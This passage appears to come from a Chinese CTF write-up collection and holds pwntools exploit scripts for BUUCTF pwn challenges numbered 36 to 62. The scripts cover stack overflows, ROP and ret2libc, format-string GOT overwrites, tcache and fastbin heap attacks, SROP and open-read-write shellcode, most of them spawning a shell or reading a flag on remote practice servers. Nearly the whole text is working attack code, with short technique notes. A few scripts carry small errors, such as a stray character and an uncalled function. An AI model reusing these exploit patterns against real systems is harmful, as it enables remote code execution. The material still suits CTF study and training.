ps_pd_pb_r=0x080485a9
start_addr=0x080483a0
payload ='a'*4 #4
payload+=p32(write_plt)
payload+=p32(ps_pd_pb_r)
payload+=p32(1) #8
payload+=p32(write_got) #c
payload+=p32(4) #10
payload+=p32(start_addr)



#gdb.attach(io,'b *0x8048524')
#pause()
io.sendafter('name?',payload)
payload ='a'*0x18
payload+=p32(s_addr)
payload+=p32(leave_ret)
io.sendafter('say?',payload)
write_got_leak=u32(io.recv(4).ljust(4,'\x00'))
log.success('write_got_leak==>{}'.format(hex(write_got_leak)))
libc=LibcSearcher('write',write_got_leak)
libc_base=write_got_leak-libc.dump('write')
system_addr=libc.dump('system')+libc_base
binsh_addr=libc.dump('str_bin_sh')+libc_base
log.success('libc_base==>{}'.format(hex(libc_base)))
log.success('system_addr==>{}'.format(hex(system_addr)))
log.success('binsh_addr==>{}'.format(hex(binsh_addr)))



payload ='a'*4
payload+=p32(system_addr)
payload+=p32(0)
payload+=p32(binsh_addr)
io.sendafter('name?',payload)

payload ='a'*0x18
payload+=p32(s_addr)
payload+=p32(leave_ret)
io.sendafter('say?',payload)
io.interactive()

36.others_shellcode

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25013)
else:
	io=process('./shell_asm')
io.interactive()

37.jarvisoj_fm

#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25721)
else:
	io=process('./fm')
	
payload =p32(0x0804A02C)
payload+='%11$n'
io.sendline(payload)
io.interactive()

38.axb_2019_fmt32

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',26542)
else:
	io=process('./axb_2019_fmt32')
elf=ELF('./axb_2019_fmt32')
printf_got=elf.got['printf']

def leak(addr):	
	payload ='a'+p32(addr)+'%8$s'
	io.sendlineafter("Please tell me:",payload)
	io.recvuntil('Repeater:a')
	io.recv(4)
	leak=u32(io.recv(4))
	log.success('printf_got_leak==>{}'.format(hex(leak)))
	return leak
def pwn(printf_leak):
	libc=LibcSearcher("printf",printf_leak)
	system_addr=printf_leak-libc.dump("printf")+libc.dump("system")
	log.success('system_addr==>{}'.format(hex(system_addr)))
	#gdb.attach(io,'b *0x0804874b')
	#pause()
	payload ='a'+fmtstr_payload(8,{printf_got:system_addr},numbwritten=0xa)
	io.sendlineafter("Please tell me:",payload)
	
	io.sendline(";/bin/sh\x00")
	io.interactive()

if __name__ == '__main__':
	printf_leak=leak(printf_got)
	pwn(printf_leak)

39.bjdctf_2020_babystack

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',29986)
else:
	io=process('./bjdctf_2020_babystack')
	
payload ='100'
io.sendlineafter('name:\n',payload)
payload ='a'*0x18
payload+=p64(0x4006e7)
io.sendlineafter('name?\n',payload)
io.interactive()

40.强网杯2019 拟态 STKOF

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25839)
else:
	io=process('./pwn2')

#32
a_r=0x080a8af6
d_c_b_r=0x0806e9f1
int_0x80=0x806f2ff
add_esp_sub_eax_edx=0x0806b225
#64
p_ax=0x000000000043b97c
p_di=0x00000000004005f6
p_si=0x0000000000405895
p_dx=0x000000000043b9d5
syscall_addr=0x0000000000461645
payload_padding ='a'*0x110+p32(add_esp_sub_eax_edx)+p32(0)
payload64=p64(p_ax)+p64(0x0)+p64(p_si)+p64(0x0069e200)+p64(p_di)+p64(0)+p64(p_dx)+p64(0x200)+p64(syscall_addr)+p64(p_ax)+p64(0x3b)+p64(p_di)+p64(0x0069e200)+p64(p_si)+p64(0)+p64(p_dx)+p64(0)+p64(syscall_addr)
payload64=payload64.ljust(0x100-4,'\x00')

payload32=p32(d_c_b_r)+p32(0x200)+p32(0x080d7200)+p32(0)+p32(a_r)+p32(3)+p32(int_0x80)+p32(d_c_b_r)+p32(0)+p32(0)+p32(0x080d7200)+p32(a_r)+p32(0xb)+p32(int_0x80)
payload=payload_padding+payload64+payload32
#gdb.attach(io,'b *0x804892f')
#pause()
io.sendline(payload)
sleep(1)
io.sendline('/bin/sh\x00')

io.interactive()

42.ciscn_2019_es_1

  • 第一个exp是用来打远程的由于buu的靶机的ubuntu18,使用的是2.27版本的2.27所以存在tcache,但是2.29之前的由于缺少检查机制,导致使用double free比较简单,直接两次free,不需要中间插一个绕过检查。然后这题思路也比较平常,先leak,但是leak的时候要把tchache填满0x400。然后正常的tchache attack。
,#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',26317)
else:
	io=process(['./ciscn_2019_es_1'])
elf=ELF('./ciscn_2019_es_1')

def add(size,name,phone):
	io.sendlineafter('choice:','1')
	io.sendlineafter('name\n',str(size))
	io.sendafter('name:\n',name)
	io.sendafter('call:\n',phone)

def show(index):
	io.sendlineafter('choice:','2')
	io.sendlineafter('index:\n',str(index))

def call(index):
	io.sendlineafter('choice:','3')
	io.sendlineafter('index:\n',str(index))


def leak():
	add(0x410,'a','a')#0
	add(0x10,'/bin/sh\x00','a')#1
	call(0)
	show(0)
	io.recvuntil('name:\n')
	leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('unsort_bin_leak==>{}'.format(hex(leak)))
	add(0x390,'a','a')#2=0
	return leak
def pwn(leak):
	malloc_hook=leak-0x70
	libc=LibcSearcher('__malloc_hook',malloc_hook)
	libc_base=malloc_hook-libc.dump('__malloc_hook')
	free_hook=libc_base+libc.dump('__free_hook')
	system_addr=libc_base+libc.dump('system')
	log.success('libc_base==>{}'.format(hex(libc_base)))
	log.success('free_hook==>{}'.format(hex(free_hook)))
	log.success('system_addr==>{}'.format(hex(system_addr)))
	add(0x60,'a','a')#3
	call(3)
	call(3)
	add(0x60,p64(free_hook),'a')
	add(0x60,p64(free_hook),'a')
	add(0x60,p64(system_addr),'a')
	call(1)
	io.interactive()
	
	
	
if __name__=='__main__':
	leak=leak()
	pwn(leak)
  • 第二个exp是用来打本地的,ubuntu16,思路跟上面的差不多。也是先leak,然后在fastbin attack (double free)。

43.jarvisoj_test_your_memory

#!usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='i386',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',26203)
else:
	io=process('./memory')
elf=ELF('./memory')
cat_flag=0x80487e0
system_addr=0x08048440
payload ='a'*23
payload+=p32(system_addr)
payload+=p32(0x08048667)
payload+=p32(cat_flag)
gdb.attach(io,'b main')
pause()
io.sendlineafter('> ',payload)
flag=io.recvline()
log.success('flag is :{}'.format(flag))

44.铁人三项(第五赛区)_2018_rop

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',28225)
else:
	io=process(['./2018_rop'])
elf=ELF('./2018_rop')
p3_r=0x0804855d
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
def leak():
	payload ='a'*0x8c
	payload+=p32(write_plt)
	payload+=p32(p3_r)
	payload+=p32(1)
	payload+=p32(write_got)
	payload+=p32(4)
	payload+=p32(main_addr)
	io.sendline(payload)
	leak=u32(io.recv(4).ljust(4,'\x00'))
	log.success('write_leak==>{}'.format(hex(leak)))
	return leak
def pwn(leak):
	libc=LibcSearcher('write',leak)
	libc_base=leak-libc.dump('write')
	system_addr=libc_base+libc.dump('system')
	binsh_addr=libc_base+libc.dump('str_bin_sh')
	payload ='a'*0x8c
	payload+=p32(system_addr)
	payload+=p32(0)
	payload+=p32(binsh_addr)
	io.sendline(payload)
	io.interactive()
if __name__=='__main__':
	leak=leak()
	pwn(leak)

45. inndy_stack z

46.jarvisoj_level1

  • 这题由于远程的接受错位问题导致本地与远程两种不同的做法,但是远程的也可以拿来打本地的。
  • exp1打本地。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27048)
else:
	io=process('./level1')

io.recvuntil('this:')
buf_addr=io.recv(10)
log.success('buf_addr==>{}'.format(buf_addr))
buf_addr=int(buf_addr,16)
shellcode=asm(shellcraft.sh())
payload =shellcode
payload=payload.ljust(0x8c,'\x00')
payload+=p32(buf_addr)
io.sendline(payload)
io.interactive()
  • exp2打远程。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27048)
else:
	io=process('./level1')
elf=ELF('./level1')
bss_addr=elf.bss()
read_plt=elf.plt['read']
p3_r=0x08048549
shellcode=asm(shellcraft.sh())
payload ='a'*0x8c
payload+=p32(read_plt)
payload+=p32(p3_r)
payload+=p32(0)
payload+=p32(bss_addr)
payload+=p32(0x200)
payload+=p32(bss_addr)
io.sendline(payload)
sleep(0.2)
io.sendline(shellcode)

io.interactive()

47.bjdctf_2020_babyrop

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',28411)
else:
	io=process('./bjdctf_2020_babyrop')
elf=ELF('./bjdctf_2020_babyrop')
pd_r=0x0000000000400733
main_addr=elf.symbols['main']
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
def leak():
	payload ='a'*0x28
	payload+=p64(pd_r)
	payload+=p64(puts_got)
	payload+=p64(puts_plt)
	payload+=p64(main_addr)
	io.sendlineafter('!\n',payload)
	print io.recv()
	leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('puts_leak==>{}'.format(hex(leak)))
	return leak
def pwn(leak):
	libc=LibcSearcher('puts',leak)
	libc_base=leak-libc.dump('puts')
	system_addr=libc_base+libc.dump('system')
	binsh_addr=libc_base+libc.dump('str_bin_sh')
	payload ='a'*0x28
	payload+=p64(pd_r)
	payload+=p64(binsh_addr)
	payload+=p64(system_addr)
	payload+=p64(0)
	io.sendlineafter('!\n',payload)
	io.interactive()
if __name__=='__main__':
	leak=leak()
	pwn(leak)

48.ciscn_2019_es_7

#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25836)
else:
	io=process('./ciscn_2019_es_7')
main_addr=0x4004f1
syscall_ret=0x400517
gadget_addr=0x4004da

payload ='/bin/sh\x00'.ljust(16,'a')
payload+=p64(main_addr)
io.sendline(payload)
io.recv(0x20)
binsh_addr=u64(io.recv(6).ljust(8,'\x00'))-0x118
log.success('binsh_addr==>{}'.format(hex(binsh_addr)))
frameExecve=SigreturnFrame()
frameExecve.rax=constants.SYS_execve
frameExecve.rdi=binsh_addr
frameExecve.rsi=0
frameExecve.rdx=0
frameExecve.rip=syscall_ret


payload='a'*16
payload+=p64(gadget_addr)
payload+=p64(syscall_ret)
payload+=str(frameExecve)
io.sendline(payload)
io.interactive()

49.hitcontraining_uaf

  • UAF,自带后门。
#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',29630)
else:
	io=process('./hacknote')


magic=0x08048945
def add(size,content='a'):
	io.sendlineafter('choice :','1')
	io.sendlineafter('size :',str(size))
	io.sendafter('content :',content)

def dele(index):
	io.sendlineafter('choice :','2')
	io.sendlineafter('Index :',str(index))

def show(index):	
	io.sendlineafter('choice :','3')
	io.sendlineafter('Index :',str(index))
	
def pwn():
	add(30)#0
	add(30)#1
	dele(0)
	dele(1)
	add(8,p32(magic))#chunk=2,content=1
	show(0)
	io.interactive()
	
	
if __name__=='__main__':
	pwn()

50.bbys_tu_2016

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'


if args.Q:
	io=remote('node3.buuoj.cn',27505)
else:
	io=process('./bbys_tu_2016')
	
payload ='a'*24
payload+=p32(0x804856d)
io.sendline(payload)
for i in range(2):
	io.recvline()
log.success('flag is :{}'.format(io.recvline()))

51.xdctf2015_pwn200

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'


if args.Q:
	io=remote('node3.buuoj.cn',29592)
else:
	io=process('./bof')
elf=ELF('./bof')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']	
def leak():
	payload ='a'*0x70
	payload+=p32(write_plt)
	payload+=p32(main_addr)
	payload+=p32(1)
	payload+=p32(write_got)
	payload+=p32(4)
	io.sendlineafter('!\n',payload)
	write_leak=u32(io.recv(4))
	log.success('write_leak==>{}'.format(hex(write_leak)))
	return write_leak
def pwn(leak):
	libc=LibcSearcher('write',leak)
	libc_base=leak-libc.dump('write')
	system_addr=libc_base+libc.dump('system')
	binsh_addr=libc_base+libc.dump('str_bin_sh')
	payload ='a'*0x70
	payload+=p32(system_addr)
	payload+=p32(0)
	payload+=p32(binsh_addr)
	io.sendlineafter('!\n',payload)
	io.interactive()
if __name__=='__main__':
	leak=leak()
	pwn(leak)

52.[ZJCTF 2019]EasyHeap

#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',29095)
else:
	io=process('./easyheap')
elf=ELF('./easyheap')
system_addr=elf.plt['system']
free_got=elf.got['free']

def add(size,content='a'):
	io.sendlineafter('choice :','1')
	io.sendlineafter('Heap :',str(size))
	io.sendafter('heap:',content)

def edit(Index,size,content):
	io.sendlineafter('choice :','2')
	io.sendlineafter('Index :',str(Index))
	io.sendlineafter('Heap :',str(size))
	io.sendafter('heap :',content)
def dele(Index):
	io.sendlineafter('choice :','3')
	io.sendlineafter('Index :',str(Index))
	
def pwn():
	add(0x68)#0 heaparray[0]
	add(0x68)#1 heaparray[1]
	dele(1)
	edit(0,0x80,'a'*0x68+p64(0x71)+p64(0x6020ad))
	add(0x68,'/bin/sh\x00')#1
	#gdb.attach(io,'b free')
	#pause()
	add(0x68,'a'*0x23+p64(free_got))#2#0x6020ad
	edit(0,0x8,p64(system_addr))
	dele(1)
	io.interactive()
	
	
if __name__=='__main__':
	pwn()

53.axb_2019_brop64

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',29892)
else:
	io=process('./axb_2019_brop64')
elf=ELF('./axb_2019_brop64')

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr=elf.sym['main']
pd_r=0x0000000000400963
ps_r15_r=0x0000000000400961
def leak():
	payload ='a'*0xd8
	payload+=p64(pd_r)
	payload+=p64(puts_got)
	payload+=p64(puts_plt)
	payload+=p64(main_addr)
	io.sendafter('me:\n',payload)
	io.recvuntil('\x61\x63\x09\x40')
	leak=u64(io.recv(6).ljust(8,'\x00'))
	
	log.success('puts_leak==>{}'.format(hex(leak)))
	return leak
def pwn(leak):
	libc=LibcSearcher('puts',leak)
	libc_base=leak-libc.dump('puts')
	system_addr=libc_base+libc.dump('system')
	binsh_addr=libc_base+libc.dump('str_bin_sh')
	log.success('libc_base==>{}'.format(hex(libc_base)))
	log.success('system_addr==>{}'.format(hex(system_addr)))
	log.success('binsh_addr==>{}'.format(hex(binsh_addr)))
	payload ='a'*0xd8
	payload+=p64(pd_r)
	payload+=p64(binsh_addr)
	payload+=p64(system_addr)
	io.sendlineafter('me:\n',payload)
	io.interactive()
if __name__=='__main__':
	leak=leak()
	pwn(leak)

54.cmcc_simplerop

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',26251)
else:
	io=process('./simplerop')
int_80_r=0x0806eef0
pop_eax=0x080bae06
pop_edx=0x0806e82a
pop_ecx_ebx=0x0806e851
read_addr=0x806cd50
binsh_addr=0x080EB120

payload ='a'*32
payload+=p32(pop_eax)
payload+=p32(3)
payload+=p32(pop_ecx_ebx)
payload+=p32(binsh_addr)
payload+=p32(0)
payload+=p32(pop_edx)
payload+=p32(8)
payload+=p32(int_80_r)
payload+=p32(pop_eax)
payload+=p32(0xb)
payload+=p32(pop_ecx_ebx)
payload+=p32(0)
payload+=p32(binsh_addr)
payload+=p32(pop_edx)
payload+=p32(0)
payload+=p32(int_80_r)
#gdb.attach(io,'b *0x8048e6f')
#pause()
io.sendlineafter(':',payload)
sleep(0.1)
io.send('/bin/sh\x00')
io.interactive()

55.jarvisoj_level5

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',26285)
else: 
	io=process('./level3_x64')

elf=ELF('./level3_x64')

write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
rdi_ret=0x4006b3
rsi_r15_ret=0x4006b1
def leak():
	payload ='a'*0x88
	payload+=p64(rdi_ret)
	payload+=p64(1)
	payload+=p64(rsi_r15_ret)
	payload+=p64(write_got)
	payload+=p64(0)
	payload+=p64(write_plt)
	payload+=p64(main_addr)
	io.sendafter('Input:\n',payload)
	write_leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('write_leak==>{}'.format(hex(write_leak)))
	return write_leak
def pwn(write_leak):
	libc=LibcSearcher('write',write_leak)
	libc_base=write_leak-libc.dump('write')
	system_addr=libc.dump('system')+libc_base
	binsh_addr=libc.dump('str_bin_sh')+libc_base
	payload ='a'*0x88
	payload+=p64(rdi_ret)
	payload+=p64(binsh_addr)
	payload+=p64(system_addr)
	io.sendafter('Input:\n',payload)
	io.interactive()z
if __name__ =='__main__':
	write_leak=leak()
	pwn(write_leak)

56.[2020 新春红包题]3

  • 这题的远程环境是2.29。考点是对于2.29&2.30的关于smallbin和tcache结合时检查不严导致能够造成类似unsortbin attack类似的效果。称为tcahce smashing unlink attack。
  • 1.先在一个大小的tcachebin中填满6个chunk
  • 2.再在对应的smallbin里面加入两个chunk
  • 3.然后修改倒数第二个chunk的fd为倒数地一个chunk的首地址,bk为想要写入libc的地址-0 x10
  • 4.在通过calloc从smallbin中拿走倒数第一个chunk这样倒数第二个chunk就会被tcache_put 丢进对应的tcachebin然后fake_chunk的fd位置就被改成一个接近libc的地址
  • 5.程序开了sandbox,只能通过orw来读flag。那我们就通过触发后门函数,进行stack povit,不过由于程序开了pie ,而且我门泄漏了heap_base,这样就可以把rop申请进heap里面,然后计算rop的位置,进行stack povit
#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25725)
else:
	io=process('./pwn1')
libc=ELF('./../../libc/libc-2.29.so')
def add(index,much,content='a'):
	io.sendlineafter('input: ','1')
	io.sendlineafter('idx: ',str(index))
	io.sendlineafter('): ',str(much)) #(1.0x10 2.0xf0 3.0x300 4.0x400)
	io.sendlineafter('content: ',content)

def dele(index):
	io.sendlineafter('input: ','2')
	io.sendlineafter('idx: ',str(index))
	
def edit(index,content):
	io.sendlineafter('input: ','3')
	io.sendlineafter('idx: ',str(index))
	io.sendlineafter('content: ',content)

def show(index):	
	io.sendlineafter('input: ','4')
	io.sendlineafter('idx: ',str(index))

def backdoor(ct):
	io.sendlineafter('input: ','666')
	io.sendlineafter("say?",ct)
def leak():
	add(0,4)
	dele(0)
	add(1,4)
	dele(1)
	show(1)
	for i in range(2,7):
		add(i,4)
		dele(i)	
	for i in range(7,13):
		add(i,2)
		dele(i)
	show(1)
	heap_base=u64(io.recv(6).ljust(8,'\x00'))-0x1270
	log.success("heap_base==>"+hex(heap_base))
	return heap_base
def pwn(heap_base):
	add(13,4)
	add(14,1)
	dele(13)
	show(13)
	libc_base=u64(io.recv(6).ljust(8,'\x00'))-0x1e4ca0
	log.success("libc_base==>"+hex(libc_base))
	add(15,3)
	add(16,4)#第一个大小为0x100的smallbin进入
	add(0,4)
	dele(16)
	add(1,3)
	add(2,4)
	edit(16,"\x00"*0x308+p64(0x101)+p64(heap_base+0x37e0)+p64(heap_base+0xa60-0x10))
	add(3,2)
	
	fake_bp=heap_base+0x4540
	flag_addr=fake_bp+0x200
	pop_rdi=0x0000000000026542+libc_base
	pop_rsi=0x0000000000026f9e+libc_base
	pop_rdx=0x000000000012bda6+libc_base
	leave_ret=0x0000000000058373+libc_base
	open_addr=libc_base+libc.sym["open"]
	read_addr=libc_base+libc.sym["read"]
	write_addr=libc_base+libc.sym["write"]
	payload ="./flag".ljust(8,'\x00')
	payload+=p64(pop_rdi)
	payload+=p64(fake_bp)
	payload+=p64(pop_rsi)
	payload+=p64(0)
	payload+=p64(open_addr)
	payload+=p64(pop_rdi)
	payload+=p64(3)
	payload+=p64(pop_rsi)
	payload+=p64(flag_addr)
	payload+=p64(pop_rdx)
	payload+=p64(0x30)
	payload+=p64(read_addr)
	payload+=p64(pop_rdi)
	payload+=p64(1)
	payload+=p64(write_addr)
	add(5,4,payload)
	#gdb.attach(io)
	#pause()
	backdoor("a"*0x80+p64(fake_bp)+p64(leave_ret))
	io.interactive()
	

if __name__=='__main__':
	leak=leak()
	pwn(leak)

57.pwnable_orw

  • 做法1
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27221)
else:
	io=process('./orw')
open_shellcode='mov eax,0x5;push 0x00000067;push 0x616c662f;mov ebx,esp;xor ecx,ecx;xor edx,edx;int 0x80;'
read_shellcode='mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x30;int 0x80;'
write_shellcode='mov eax,0x4;mov ebx,0x1;int 0x80;'
shellcode=asm(open_shellcode+read_shellcode+write_shellcode)
io.sendafter(':',shellcode)
print io.recv()
  • 做法2
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27221)
else:
	io=process('./orw')
elf=ELF('./orw')
open_shellcode=shellcraft.open('/flag')
read_shellcode=shellcraft.read(3,elf.bss(),0x30)
write_shellcode=shellcraft.write(1,elf.bss(),0x30)
shellcode=asm(open_shellcode+read_shellcode+write_shellcode)
io.sendafter(':',shellcode)
print io.recv()

58.axb_2019_fmt6

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25479)
else:
	io=process('./axb_2019_fmt64')
elf=ELF('./axb_2019_fmt64')
sprintf_got=elf.got['sprintf']
printf_got=elf.got['printf']
print hex(printf_got)
print hex(printf_got)
def leak():
	payload ='%9$s'.ljust(8)+p64(sprintf_got)
	#payload =p64(sprintf_got)+'%9$s'
	io.sendafter('me:',payload)
	leak=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
	log.success('sprintf_leak==>{}'.format(hex(leak)))
	return leak
def write(leak):
	libc=LibcSearcher('sprintf',leak)
	system_addr=leak-libc.dump('sprintf')+libc.dump('system')
	log.success('system_addr==>{}'.format(hex(system_addr)))
	di=system_addr&0xffff
	zhong=system_addr>>16&0xffff
	print hex(di)
	print hex(zhong)
	payload=('%'+str(di-0x9)+'c%12$hn'+'%'+str(zhong-di)+'c%13$hn').ljust(32,'a')+p64(printf_got)+p64(printf_got+2)
	io.sendlineafter('me:',payload)
	#gdb.attach(io,'b sprintf')
	io.sendline(';/bin/sh\x00')
	io.interactive()
	
if __name__=='__main__':
	leak=leak()

59.axb_2019_heap

60.xman_2018_main

  • 本地能通,远程的话由于输出的问题导致接受不到,无法leak所以不能通。
#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25013)
else:
	io=process(['./Xman_2018_main'])
elf=ELF('./Xman_2018_main')

pop_rdi=0x0000000000400693
pop_rsi_r15=0x0000000000400691
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr=elf.symbols['main']
leave_ret=0x000000000040060f
bss_addr=0x601060+0x100
bss2_addr=0x601060+0x100+0x30
def leak():
	payload ='a'*0x108
	payload+=p64(pop_rdi)
	payload+=p64(puts_got)
	payload+=p64(puts_plt)
	payload+=p64(main_addr)
	io.sendlineafter('bss:\n',payload)
	payload='a'*0xa
	payload+=p64(bss_addr)
	payload+=p64(leave_ret)
	io.sendlineafter('stack:\n',payload)
	puts_leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('puts_leak==>{}'.format(hex(puts_leak)))
	return puts_leak
def pwn(puts_leak):
	gdb.attach(io,'b *0x400610')
	pause()
	libc=LibcSearcher('puts',puts_leak)
	libc_base=puts_leak-libc.dump('puts')
	log.success('libc_base==>{}'.format(hex(libc_base)))
	system_addr=libc_base+libc.dump('system')
	binsh_addr=libc_base+libc.dump('binsh_addr')
	log.success('system_addr==>{}'.format(hex(system_addr)))
	log.success('binsh_addr==>{}'.format(hex(binsh_addr)))
	#payload ='a'*(0x108-32)+p64(leave_ret)+'a'*24
	#payload ='a'*0xe8+p64(pop_rdi)+'a'*8+p64(pop_rdi)+'a'*8
	payload ='a'*0x108
	payload+=p64(pop_rdi)
	payload+=p64(binsh_addr)
	payload+=p64(system_addr)
	payload+=p64(main_addr)
	io.sendlineafter('bss:\n',payload)
	payload='a'*0xa
	payload+=p64(bss_addr)
	payload+=p64(leave_ret)
	io.sendline(payload)
	io.interactive()
if __name__=='__main__':
	puts_leak=leak()
	pwn(puts_leak)

61.inny_rop

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'
if args.Q:
	io=remote('node3.buuoj.cn',26422)
else:
	io=process('./rop')
int_80=0x0806F430
pop_eax=0x080b8016
pop_ebx_edx=0x0806ecd9
pop_ecx=0x080de769
binsh_addr=0x080EB400

payload ='a'*0x10
payload+=p32(pop_eax)
payload+=p32(0x3)
payload+=p32(pop_ebx_edx)
payload+=p32(0)
payload+=p32(0x10)
payload+=p32(pop_ecx)
payload+=p32(binsh_addr)
payload+=p32(int_80)
payload+=p32(pop_eax)
payload+=p32(0xb)
payload+=p32(pop_ebx_edx)
payload+=p32(binsh_addr)
payload+=p32(0)
payload+=p32(pop_ecx)
payload+=p32(0)
payload+=p32(int_80)


io.sendline(payload)
sleep(0.1)
#gdb.attach(io)
#pause()
io.sendline('/bin/sh\x00')
io.interactive()

62.bjdctf_2020_babystack2

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',26789)
else:
	io=process('./bjdctf_2020_babystack2')
backdoor=0x400726
payload='a'*0x18
payload+=p64(backdoor)
io.sendlineafter('name:\n','-1')
io.sendlineafter('name?\n',payload)
io.interactive()